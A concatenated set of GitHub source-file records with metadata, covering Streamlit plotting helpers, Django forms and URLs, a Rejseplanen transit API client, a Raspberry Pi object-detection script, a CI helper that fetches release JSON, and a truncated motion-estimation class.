df.groupby(['species', 'month'])['month'].agg(['count']).reset_index()\n df = df[df[\"species\"]== f\"{x_axis}\"]\n return px.bar(df, x='month', y = \"count\", title='Number of presences epr month')\n\n\ndef load_info():\n return pd.read_csv(\"data/species_info.csv\", index_col=0)\n\n\ndef maps(df):\n map_sby = folium.Map(tiles=\"OpenStreetMap\", location=[40.4146, -3.7004], zoom_start=2)\n\n for i,row in df.iterrows():\n \n icon = Icon(color = \"green\",\n prefix = \"fa\",\n icon = \"fa-map-marker\",\n icon_color = \"black\"\n )\n\n location_ = {\"location\" : [row[\"lat\"],row[\"lon\"]],\n \"tooltip\" : row[\"locality\"]}\n \n\n marker_2 = Marker(**location_, icon = icon).add_to(map_sby)\n\n return folium_static(map_sby)\n\ndef kepler (df, con):\n df = pd.DataFrame(df.groupby(['fecha', 'species', 'lat', 'lon'])['number_ind'].sum()).reset_index()\n st.dataframe(df)\n map_3 = KeplerGl(height=600, width=800, config = con)\n map_3.add_data(data = df, name='algae' )\n\n return keplergl_static(map_3)", "repo_name": "Ironhack-Part-Time-Enero2022/apuntes-clases", "sub_path": "semana-11/Streamlit/src/support.py", "file_name": "support.py", "file_ext": "py", "file_size_in_byte": 3345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "plotly_express.pie", "line_number": 27, "usage_type": "call"}, {"api_name": "plotly_express.pie", "line_number": 40, "usage_type": "call"}, {"api_name": "plotly_express.line", "line_number": 60, "usage_type": "call"}, {"api_name": "plotly_express.bar", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 77, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 81, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 85, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit_folium.folium_static", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 101, "usage_type": "call"}, {"api_name": "keplergl.KeplerGl", "line_number": 102, "usage_type": "call"}, {"api_name": "streamlit_keplergl.keplergl_static", "line_number": 105, "usage_type": "call"}]}
+{"seq_id": "42125683728", "text": "from django.forms import ModelForm\nfrom .models import Item, Outfit\nfrom django import forms\nfrom django.utils.safestring import mark_safe\n\n\nclass CustomModelMultipleChoiceField(forms.ModelMultipleChoiceField):\n def label_from_instance(self, items):\n if items.url:\n return mark_safe(\" \" % items.url)\n else:\n return mark_safe(\" \" % items.imageURL)\n \n\nclass ItemForm(ModelForm):\n class Meta:\n model = Item\n fields = ['name', 'description', 'type', 'image', 'url', 'price', 'sell']\n labels = {\n 'name': 'Item name',\n 'description': 'Item description',\n 'type': 'Item type',\n 'image': 'Item image', \n 'url': 'Image url (if not uploading an image)',\n 'price': 'Price (if item is for sale)',\n 'sell': 'For sale?',\n \n }\n\n def __init__(self, *args, **kwargs):\n super(ItemForm, self).__init__(*args, **kwargs)\n for name, field in self.fields.items():\n field.widget.attrs.update({'class': 'input'})\n\n\nclass OutfitForm(ModelForm):\n class Meta:\n model = Outfit\n fields = ['name', 'description', 'items']\n labels = {\n 'name': 'Outfit Name',\n 'description': 'Outfit Description',\n 'items': 'Outfit Items',\n }\n\n \n items = CustomModelMultipleChoiceField(\n queryset=None,\n widget=forms.CheckboxSelectMultiple\n )\n\n def __init__(self, *args, **kwargs):\n \"\"\" Grants access to the request object so that only members of the current user\n are given as options\"\"\"\n\n self.request = kwargs.pop('request')\n super(OutfitForm, self).__init__(*args, **kwargs)\n self.fields['items'].queryset = Item.objects.filter(\n owner=self.request.user.profile)\n\n", "repo_name": "davemolk/closet_companion", "sub_path": "wardrobe/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Outfit", "line_number": 38, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 49, "usage_type": "name"}, {"api_name": "models.Item.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "408394391", "text": "\"\"\"\nPython implementation of communication with Rejseplanen API.\n\nMore information about the API can be found at\nhttps://help.rejseplanen.dk/hc/en-us/articles/214174465-Rejseplanen-s-API\n\n\"\"\"\nfrom datetime import datetime\nimport requests\n\nfrom .classes import *\nfrom .constants import *\n\ndef _request(service, params, timeout):\n params['format'] = 'json'\n \n try:\n response = requests.get(RESOURCE+service, params, timeout=timeout)\n except requests.exceptions.RequestException as e:\n raise rjplConnectionError(e)\n\n if response.status_code == 200:\n return response.json()\n else:\n raise rjplHTTPError('Error: ' + str(response.status_code) +\n str(response.content))\n\ndef location(input, timeout=5):\n \"\"\" Perform a pattern matching of user input.\n\n Args:\n input (str): The search input.\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Returns:\n Dictionary object.\n Keys:\n 'StopLocation': List of dictionaries of stop locations with coordinates.\n 'CoordLocation': List of dictionaries of named points of interests with coordinates.\n \"\"\"\n params = {}\n\n if isinstance(input, str):\n params['input'] = input\n else:\n raise TypeError(\"Expected got {}\".format(type(input)))\n \n response = _request('location', params, timeout)\n\n result = response['LocationList']\n\n if 'error' in result:\n raise rjplAPIError(result['error'])\n\n return result\n\ndef trip(origin, destination, viaId=None, time=None, searchForArrival=None, useTrain=True, \n useBus=True, useMetro=True, useBicycle=False, maxWalkingDistanceDep=None, \n maxWalkingDistanceDest=None, maxCyclingDistanceDep=None, maxCyclingDistanceDest=None, timeout=10):\n \"\"\" Calculates trip from specified origin to specified destination. \n\n Args:\n origin (rjpl.Coord or rjpl.Stop): Trip origin.\n destination (rjpl.Coord or rjpl.Stop): Trip destination.\n viaId (int): Id of stop to force the trip through.\n time (datetime): Departure date and time of the trip. (default: current server time)\n searchForArrival (bool): If true, time will be used for arrival time instead. (default: False)\n useTrain (bool): Whether to travel by train (default: True)\n useBus (bool): Whether to travel by bus (default: True)\n useMetro (bool): Whether to travel by metro (default: True)\n useBicycle (bool): Restrict to trips which allow carriage of bicycles. (default: False)\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Extra args if useBicycle=False:\n maxWalkingDistanceDep (int): The max walking distance from start location to the first mode of transportation.\n maxWalkingDistanceDest (int): The max walking distance from last mode of transportation to the destination.\n\n Extra args if useBicycle=True\n maxCyclingDistanceDep (int): The max biking distance from start location to the first mode of public transportation.\n maxCyclingDistanceDest (int): The max biking distance from the last mode of public transportation to the destination.\n\n Returns:\n List of possible trips from origin to destination. The trips are given as dictonaries, with a list of legs.\n \"\"\"\n params = {}\n\n if isinstance(origin, Place):\n if isinstance(origin, Stop):\n params['originId'] = origin.stop_id\n elif isinstance(origin, Coord):\n params['originCoordX'] = int(COORDINATE_MULTIPLIER*origin.coordX)\n params['originCoordY'] = int(COORDINATE_MULTIPLIER*origin.coordY)\n params['originCoordName'] = origin.name\n else:\n raise TypeError(\"Unknown instance of .\")\n else:\n raise TypeError(\"Expected got {}.\".format(type(origin)))\n\n if isinstance(destination, Place):\n if isinstance(destination, Stop):\n params['destId'] = destination.stop_id\n elif isinstance(destination, Coord):\n params['destCoordX'] = int(COORDINATE_MULTIPLIER*destination.coordX)\n params['destCoordY'] = int(COORDINATE_MULTIPLIER*destination.coordY)\n params['destCoordName'] = destination.name\n else:\n raise TypeError(\"Unknown instance of .\")\n else:\n raise TypeError(\"Expected got {}.\".format(type(destination)))\n\n if viaId is not None:\n if isinstance(viaId, int):\n params['viaId'] = viaId\n else:\n raise TypeError(\"Expected got {}.\".format(type(viaId)))\n\n if searchForArrival is not None:\n if isinstance(searchForArrival, bool):\n params['searchForArrival'] = int(searchForArrival)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(searchForArrival)))\n \n if isinstance(useTrain, bool):\n params['useTog'] = int(useTrain)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useTrain)))\n \n if isinstance(useBus, bool):\n params['useBus'] = int(useBus)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useBus)))\n \n if isinstance(useMetro, bool):\n params['useMetro'] = int(useMetro)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useMetro)))\n \n if time:\n if isinstance(time, datetime):\n params['date'] = time.strftime(DATE_FORMAT)\n params['time'] = time.strftime(TIME_FORMAT)\n else:\n raise TypeError('Expected datetime.datime, got {}.'.format(type(time)))\n\n if isinstance(useBicycle, bool):\n params['useBicycle'] = int(useBicycle)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useBus)))\n\n if useBicycle:\n if maxWalkingDistanceDep is not None:\n raise ValueError(\"Can't use maxWalkingDistanceDep with useBicycle.\")\n if maxWalkingDistanceDest is not None:\n raise ValueError(\"Can't use maxWalkingDistanceDest with useBicycle.\")\n\n if maxCyclingDistanceDep is not None:\n if isinstance(maxCyclingDistanceDep, int):\n if maxCyclingDistanceDep >= 500 and maxCyclingDistanceDep <= 20000:\n params['maxCyclingDistanceDep'] = maxCyclingDistanceDep\n else:\n raise ValueError(\"maxCyclingDistanceDep out of bounds.\")\n else:\n raise TypeError(\"Expected , got {}.\".format(type(maxCyclingDistanceDep))) \n if maxCyclingDistanceDest is not None:\n if isinstance(maxCyclingDistanceDest, int):\n if maxCyclingDistanceDest >= 500 and maxCyclingDistanceDest <= 20000:\n params['maxCyclingDistanceDest'] = maxCyclingDistanceDest\n else:\n raise ValueError(\"maxCyclingDistanceDest out of bounds.\")\n else:\n raise TypeError(\"Expected , got {}.\".format(type(maxCyclingDistanceDest)))\n\n else:\n if maxCyclingDistanceDep is not None:\n raise ValueError(\"Can't use maxCyclingDistanceDep without useBicycle.\")\n if maxCyclingDistanceDest is not None:\n raise ValueError(\"Can't use maxCyclingDistanceDest without useBicycle.\")\n\n if maxWalkingDistanceDep is not None:\n if isinstance(maxWalkingDistanceDep, int):\n if maxWalkingDistanceDep >= 500 and maxWalkingDistanceDep <= 20000:\n params['maxWalkingDistanceDep'] = maxWalkingDistanceDep\n else:\n raise ValueError(\"maxWalkingDistanceDep out of bounds.\")\n else:\n raise TypeError(\"Expected , got {}.\".format(type(maxWalkingDistanceDep))) \n if maxWalkingDistanceDest is not None:\n if isinstance(maxWalkingDistanceDest, int):\n if maxWalkingDistanceDest >= 500 and maxWalkingDistanceDest <= 20000:\n params['maxWalkingDistanceDep'] = maxWalkingDistanceDest\n else:\n raise ValueError(\"maxWalkingDistanceDest out of bounds.\")\n else:\n raise TypeError(\"Expected , got {}.\".format(type(maxWalkingDistanceDest))) \n\n response = _request('trip', params, timeout)\n\n result = response['TripList']\n if 'error' in result:\n raise rjplAPIError(result['error'])\n\n return result['Trip']\n\n\ndef departureBoard(stop_id, useTrain=True, useBus=True, useMetro=True, time=None, offset=None, timeout=10):\n \"\"\" Retrieve a station departure board.\n\n Args:\n stop_id (int): The station id. Can be retrieved with the location() call.\n useTrain (bool): Whether to travel by train (default: True)\n useBus (bool): Whether to travel by bus (default: True)\n useMetro (bool): Whether to travel by metro (default: True)\n time (datetime): Departure date and time of the trip. (default: current server time)\n offset (int): Search a number of minutes into the future. Use either time or offset.\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Returns:\n A list of dictionaries, each containing departure name, time, direction and type.\n \"\"\"\n params = {}\n\n if type(stop_id) is int:\n params['id'] = stop_id\n else:\n raise TypeError(\"Expected , got {}.\".format(type(stop_id)))\n\n if isinstance(useTrain, bool):\n params['useTog'] = int(useTrain)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useTrain)))\n \n if isinstance(useBus, bool):\n params['useBus'] = int(useBus)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useBus)))\n \n if isinstance(useMetro, bool):\n params['useMetro'] = int(useMetro)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(useMetro)))\n \n if time and offset:\n raise ValueError('Cannot specify both time and offset.')\n\n if time:\n if isinstance(time, datetime):\n params['date'] = time.strftime(DATE_FORMAT)\n params['time'] = time.strftime(TIME_FORMAT)\n else:\n raise TypeError('Expected datetime.datime, got {}.'.format(type(time)))\n\n if offset:\n if isinstance(offset, int):\n params['offset'] = offset\n else:\n raise TypeError(\"Expected , got {}.\".format(type(offset)))\n\n response = _request('departureBoard', params, timeout)\n \n result = response['DepartureBoard']\n\n # This key is present on error\n if 'error' in result:\n raise rjplAPIError(result['error'])\n\n return result['Departure']\n\n\ndef multiDepartureBoard(*ids, **args):\n \"\"\" Retrieve multiple station departure boards at once.\n\n Args:\n *args: Variable length argument list: The stop ids.\n **kwargs: Keyword arguments:\n useTrain (bool): Whether to travel by train (default: True)\n useBus (bool): Whether to travel by bus (default: True)\n useMetro (bool): Whether to travel by metro (default: True)\n time (datetime): Departure date and time of the trip. (default: current server time)\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Returns:\n A list of dictionaries, each containing departure name, time, direction and type.\n The results from all stops are mixed, but can be filtered by stop.\n \"\"\"\n\n if len(ids) < 1:\n raise ValueError(\"Need at least one id.\")\n\n params = {'id{}'.format(i+1): ids[i] for i in range(len(ids))}\n timeout = 10\n\n for key in args.keys():\n if key == 'time':\n if isinstance(args['time'], datetime):\n params['date'] = args['time'].strftime(DATE_FORMAT)\n params['time'] = args['time'].strftime(TIME_FORMAT)\n else:\n raise TypeError('Expected datetime.datime, got {}.'.format(type(args['time'])))\n\n elif key == 'useTrain':\n if isinstance(args['useTrain'], bool):\n params['useTog'] = int(args['useTrain'])\n else:\n raise TypeError(\"Expected , got {}.\".format(type(args['useTrain'])))\n \n elif key == 'useBus':\n if isinstance(args['useBus'], bool):\n params['useBus'] = int(args['useBus'])\n else:\n raise TypeError(\"Expected , got {}.\".format(type(args['useBus'])))\n\n elif key == 'useMetro':\n if isinstance(args['useMetro'], bool):\n params['useMetro'] = int(args['useMetro'])\n else:\n raise TypeError(\"Expected , got {}.\".format(type(args['useMetro'])))\n\n elif key == 'timeout':\n if isinstance(args['timeout'], int):\n timeout=args['timeout']\n else:\n raise TypeError(\"Expected , got {}.\".format(type(args['timeout'])))\n \n else:\n raise ValueError(\"Unknown argument '{}'.\".format(key))\n \n response = _request('multiDepartureBoard', params, timeout=timeout)\n\n result = response['MultiDepartureBoard']\n\n if 'error' in result:\n raise rjplAPIError(result['error'])\n\n return result['Departure']\n\ndef stopsNearby(coordX, coordY, maxRadius=None, maxNumber=None, timeout=5):\n \"\"\" Finds stops close to given coordinates.\n\n Args:\n coordX (float): Longitude.\n coordY (float): Latitude.\n maxRadius (int): The radius in meters to search within.\n maxNumber (int): The number of results to return.\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Returns:\n A list of nearby stops where each stop is a dictionary.\n \"\"\"\n params = {}\n if isinstance(coordX, float):\n params['coordX'] = int(COORDINATE_MULTIPLIER*coordX)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(coordX)))\n\n if isinstance(coordY, float):\n params['coordY'] = int(COORDINATE_MULTIPLIER*coordY)\n else:\n raise TypeError(\"Expected , got {}.\".format(type(coordY)))\n\n if maxRadius is not None:\n if isinstance(maxRadius, int):\n params['maxRadius'] = maxRadius\n else:\n raise TypeError(\"Expected , got {}.\".format(type(coordX)))\n\n if maxNumber is not None:\n if isinstance(maxNumber, int):\n params['maxNumber'] = maxNumber\n else:\n raise TypeError(\"Expected , got {}.\".format(type(coordX)))\n\n response = _request('stopsNearby', params, timeout)\n\n result = response['LocationList']\n if 'error' in result:\n raise rjplAPIError(result['error'])\n return result.get('StopLocation', [])\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "thomaspasser/python-rejseplanen", "sub_path": "rjpl/methods.py", "file_name": "methods.py", "file_ext": "py", "file_size_in_byte": 15009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 246, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 294, "usage_type": "argument"}]}
+{"seq_id": "10251246962", "text": "import time\nimport random\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef default(name):\n time.sleep(random.randint(1, 5))\n return \"hi, {}\".format(name)\n\nif __name__ == '__main__':\n app.run()\n\n\n\n", "repo_name": "perrydzhu/pydem0", "sub_path": "thread-process/web_demo.py", "file_name": "web_demo.py", "file_ext": "py", "file_size_in_byte": 231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "30082150233", "text": "import cv2 as cv\nimport glob\nimport os\nimport numpy\nimport serial\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\n\nfont = cv.FONT_HERSHEY_DUPLEX\n\nCONF = 0.6\n\nser = serial.Serial(\n\n port='/dev/ttyS0',\n baudrate = 9600,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=0.1,\n write_timeout=0.1)\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\nrawCapture = PiRGBArray(camera)\n\n# Wait for the automatic gain control to settle\ntime.sleep(2)\n\n# Now fix the values\ncamera.shutter_speed = camera.exposure_speed\ncamera.exposure_mode = 'off'\ng = camera.awb_gains\ncamera.awb_mode = 'off'\ncamera.awb_gains = g\n\ncvNet = cv.dnn.readNetFromTensorflow('sorted_inference_graph.pb', 'graph.pbtxt')\n\ncount = 0\n\nwhile True:\n\n serData = ser.readline()\n #print(serData)\n if serData == b'1\\r\\n':\n print(\"Testing image\")\n #Take image\n rawCapture = PiRGBArray(camera)\n camera.capture(rawCapture, format=\"bgr\")\n \n img = rawCapture.array\n img = cv.flip(img, -1)\n\n height, width, channels = img.shape\n \n scr_x = round(width/2)\n scr_y = round(height/2)\n\n cvNet.setInput(cv.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False))\n cvOut = cvNet.forward()\n\n \n netMax = 0\n arrayMax = [0,0,0,0,0,0,0]\n \n for detection in cvOut[0,0,:,:]:\n \n if float(detection[2]) > netMax:\n netMax = detection[2]\n arrayMax = detection\n \n\t\t# print(arrayMax)\n \n\t\t# print(cvOut)\n \n score = float(arrayMax[2])\n\n if score > CONF:\n\n left = int(arrayMax[3] * width)\n top = int(arrayMax[4] * height)\n right = int(arrayMax[5] * width)\n bottom = int(arrayMax[6] * height)\n\n cx = round(left - (left- right)/2)\n cy = round(top - (top- bottom)/2)\n\n cv.line(img,(cx,scr_y),(scr_x,scr_y),(255,0,0),2)\n cv.line(img,(cx,scr_y),(cx,cy),(255,0,0),2)\n\n #Cross hairs\n cv.line(img,(scr_x-20,scr_y),(scr_x+20,scr_y),(238,244,21),3)\n cv.line(img,(scr_x,scr_y-20),(scr_x,scr_y+20),(238,244,21),3)\n\n cv.circle(img,(cx,cy), 3, (0,0,255), -1)\n \n Offest = scr_x - cx\n\n print(\"Offest X: {}\".format(Offest))\n\n #Detection box\n cv.rectangle(img, (left, top), (right, bottom), (23, 230, 210), thickness=2)\n\n #Put text on image\n cv.putText(img,\"X_Of:\"+str(Offest)+\"px\",(10,430), font, 2,(0,0,0),3,cv.LINE_AA)\n cv.putText(img,\"P():\"+str(round(score*100))+\"%\",(10,500), font, 2,(0,0,0),3,cv.LINE_AA)\n\n #Save image\n cv.imwrite('detect_img/{}.png'.format(count),img)\n cv.imwrite('/home/pi/Desktop/Website/img/img.png',img)\n count += 1\n \n print(\"Found\")\n\n serilString = \"1,\"+ str(Offest)+\"|\"\n ser.write(serilString.encode('utf-8'))\n \n else:\n print(\"Not found\")\n serilString = \"0,0000|\"\n ser.write(serilString.encode('utf-8'))\n cv.imwrite('/home/pi/Desktop/Website/img/img.png',img)\n\n\n else:\n ser.flush()\n ", "repo_name": "JTmax/Mech2_Assessment_3", "sub_path": "RaspCode/cnn_cup_model_offset.py", "file_name": "cnn_cup_model_offset.py", "file_ext": "py", "file_size_in_byte": 3346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.FONT_HERSHEY_DUPLEX", "line_number": 10, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 18, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 19, "usage_type": "attribute"}, {"api_name": "picamera.PiCamera", "line_number": 24, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.dnn.readNetFromTensorflow", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 105, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 105, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 106, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 122, "usage_type": "call"}]}
+{"seq_id": "10739097396", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.loginUser, name='login'),\n path('logout/', views.logoutUser, name='logout'),\n path('register/', views.registerUser, name='register'),\n # path('api/photos/', views.getPhotos, name=\"get-photos\"),\n\n path('gallary/', views.gallary, name= \"gallary\"),\n path('photo//', views.viewPhoto, name= \"photo\"),\n path('check', views.check, name=\"check\"),\n path('add/', views.addPhoto, name= \"addPhoto\"),\n path('category/', views.addCategory, name= \"addCategory\"),\n]", "repo_name": "thansoe-2000/photo-album", "sub_path": "myapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "4039455961", "text": "from setuptools import setup, Distribution\n\n\nclass BinaryDistribution(Distribution):\n def is_pure(self):\n return False\n\n\nsetup(\n name='Coliform',\n version='0.7.5.1',\n description='Coliform UPRM Project Library, Written for Raspberry Pi',\n packages=['Coliform'],\n author='Osvaldo E Duran',\n author_email='osvaldo.duran@upr.edu',\n url='https://github.com/Regendor/coliform-project',\n classifiers=['Programming Language :: Python :: 3', 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)'],\n # install_requires=['Adafruit_TCS34725'],\n distclass=BinaryDistribution\n)\n", "repo_name": "uprm-research-resto/coliform-project", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.Distribution", "line_number": 4, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "18903580958", "text": "#!/usr/bin/env python3\n# pylint: disable=invalid-name\n\nfrom argparse import ArgumentParser\nimport os\nfrom pathlib import Path\nimport subprocess\n\nif 'GITHUB_ACTIONS' in os.environ:\n repo = Path(os.environ['GITHUB_WORKSPACE'])\nelse:\n repo = Path(__file__).resolve().parents[1]\n\nparser = ArgumentParser(\n description='Download latest boot-utils release JSON from GitHub API')\nparser.add_argument('github_token', help='Value of GITHUB_TOKEN')\nargs = parser.parse_args()\n\ncurl_cmd = [\n 'curl', '--header', 'Accept: application/vnd.github+json', '--header',\n f\"Authorization: Bearer {args.github_token}\", '--output',\n Path(repo, 'boot-utils.json'), '--silent', '--show-error',\n 'https://api.github.com/repos/ClangBuiltLinux/boot-utils/releases/latest'\n]\nsubprocess.run(curl_cmd, check=True)\n", "repo_name": "ClangBuiltLinux/continuous-integration2", "sub_path": "scripts/generate-boot-utils-json.py", "file_name": "generate-boot-utils-json.py", "file_ext": "py", "file_size_in_byte": 806, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "8228202872", "text": "import numpy as np\r\nfrom scipy.spatial import distance\r\nimport cv2\r\nimport math\r\n\r\nimport image_preprocess as IMG\r\nimport time\r\n\r\nfrom Lidar_tools import edge_detect, polar_to_cartesian, interpolation, find_lidar_theta_phi_from_coord_Ma\r\nfrom Lidar_tools_AG import build_roatation_matrix_3D, coords_ro_move\r\n\r\n\r\n\r\nclass Move_esti:\r\n def __init__(self, Lidar_info, Camera_info):\r\n self.plot = 1\r\n self.initialized = 0\r\n self.v_sample = Camera_info['v_sample']\r\n self.h_sample = Camera_info['h_sample']\r\n self.focus = Camera_info['focus']\r\n self.y_sample = Lidar_info['y_sample']\r\n self.x_sample = Lidar_info['x_sample']\r\n self.x_sample_deg = Lidar_info['x_sample_deg']\r\n self.y_sample_deg = Lidar_info['y_sample_deg']\r\n self.upper_lim = Lidar_info['upper_lim']\r\n self.lidar_range = Lidar_info['lidar_range']\r\n\r\n\r\n self.depth_image_now = None\r\n self.depth_image_last = None\r\n self.dt_in_game = None\r\n self.magnitude_image = None\r\n self.direction_image = None\r\n self.mag_read = None\r\n self.direc_read = None\r\n\r\n self.reference_x = None\r\n self.reference_y = None\r\n\r\n self.m_candidate_coord_last = np.array([])\r\n self.m_candidate2_coord_last = np.array([])\r\n self.m_tracked_coord_last = np.array([])\r\n\r\n self.m_tracked_spd_last = np.array([])\r\n self.m_candidate_spd_last = np.array([])\r\n self.m_candidate2_spd_last = np.array([])\r\n\r\n self.s_candidate_coord_last = np.array([])\r\n self.s_candidate2_coord_last = np.array([])\r\n self.s_tracked_coord_last = np.array([])\r\n\r\n self.pitch = None\r\n self.delta_roll = None\r\n self.delta_pitch = None\r\n self.delta_yaw = None\r\n self.speed_now = None\r\n self.acc = None\r\n\r\n self.move_z = None\r\n self.move_x = None\r\n self.move_y = None\r\n self.depth_x_now = None\r\n self.depth_y_now = None\r\n self.depth_z_now = None\r\n self.row_image_now = None\r\n self.col_image_now = None\r\n\r\n self.ground_marker = None\r\n\r\n\r\n def input(self, ground_marker, magnitude_image, direction_image, depth_image, dt_in_game,\r\n pitch, delta_roll, delta_pitch, delta_yaw, speed_now, acc):\r\n\r\n self.depth_image_now = depth_image\r\n self.dt_in_game = dt_in_game\r\n self.magnitude_image = magnitude_image\r\n self.direction_image = direction_image\r\n\r\n\r\n self.pitch = pitch\r\n self.delta_roll = delta_roll\r\n self.delta_pitch = delta_pitch\r\n self.delta_yaw = delta_yaw\r\n self.speed_now = speed_now\r\n self.acc = acc\r\n\r\n self.ground_marker = ground_marker\r\n\r\n self.calculate_movement()\r\n\r\n\r\n def calculate_movement(self):\r\n # simple ver. only using the yaw to estimate, in camera coord: x,y,z refer to front, width, height\r\n dt_in_game = 